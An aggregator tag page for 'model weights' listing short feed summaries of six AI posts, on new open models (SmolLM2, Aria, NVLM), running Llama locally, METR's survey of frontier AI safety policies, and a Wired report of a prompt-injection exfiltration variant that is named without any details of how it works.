Tag: model weights

  • Simon Willison’s Weblog: SmolLM2

    Source URL: https://simonwillison.net/2024/Nov/2/smollm2/#atom-everything Source: Simon Willison’s Weblog Title: SmolLM2 Feedly Summary: SmolLM2 New from Loubna Ben Allal and her research team at Hugging Face: SmolLM2 is a family of compact language models available in three size: 135M, 360M, and 1.7B parameters. They are capable of solving a wide range of tasks while being lightweight enough…

  • METR Blog – METR: Common Elements of Frontier AI Safety Policies

    Source URL: https://metr.org/blog/2024-08-29-common-elements-of-frontier-ai-safety-policies/ Source: METR Blog – METR Title: Common Elements of Frontier AI Safety Policies Feedly Summary: AI Summary and Description: Yes Summary: The text discusses the Frontier AI Safety Commitments made by sixteen developers of large foundation models at the AI Seoul Summit, which focus on risk evaluation and mitigation strategies to ensure…

  • Simon Willison’s Weblog: This prompt can make an AI chatbot identify and extract personal details from your chats

    Source URL: https://simonwillison.net/2024/Oct/22/imprompter/#atom-everything Source: Simon Willison’s Weblog Title: This prompt can make an AI chatbot identify and extract personal details from your chats Feedly Summary: This prompt can make an AI chatbot identify and extract personal details from your chats Matt Burgess in Wired magazine writes about a new prompt injection / Markdown exfiltration variant…

  • Hacker News: Run Llama locally with only PyTorch on CPU

    Source URL: https://github.com/anordin95/run-llama-locally Source: Hacker News Title: Run Llama locally with only PyTorch on CPU Feedly Summary: Comments AI Summary and Description: Yes Summary: The text provides detailed instructions and insights on running the Llama large language model (LLM) locally with minimal dependencies. It discusses the architecture, dependencies, and performance considerations while using variations of…

  • Hacker News: ARIA: An Open Multimodal Native Mixture-of-Experts Model

    Source URL: https://arxiv.org/abs/2410.05993 Source: Hacker News Title: ARIA: An Open Multimodal Native Mixture-of-Experts Model Feedly Summary: Comments AI Summary and Description: Yes Summary: The text discusses the introduction of “Aria,” an open multimodal native mixture-of-experts AI model designed for various tasks including language understanding and coding. As an open-source project, it offers significant advantages for…

  • Hacker News: Nvidia releases NVLM 1.0 72B open weight model

    Source URL: https://huggingface.co/nvidia/NVLM-D-72B Source: Hacker News Title: Nvidia releases NVLM 1.0 72B open weight model Feedly Summary: Comments AI Summary and Description: Yes Summary: The text introduces NVLM 1.0, a new family of advanced multimodal large language models (LLMs) developed with a focus on vision-language tasks. It demonstrates state-of-the-art performance comparable to leading proprietary and…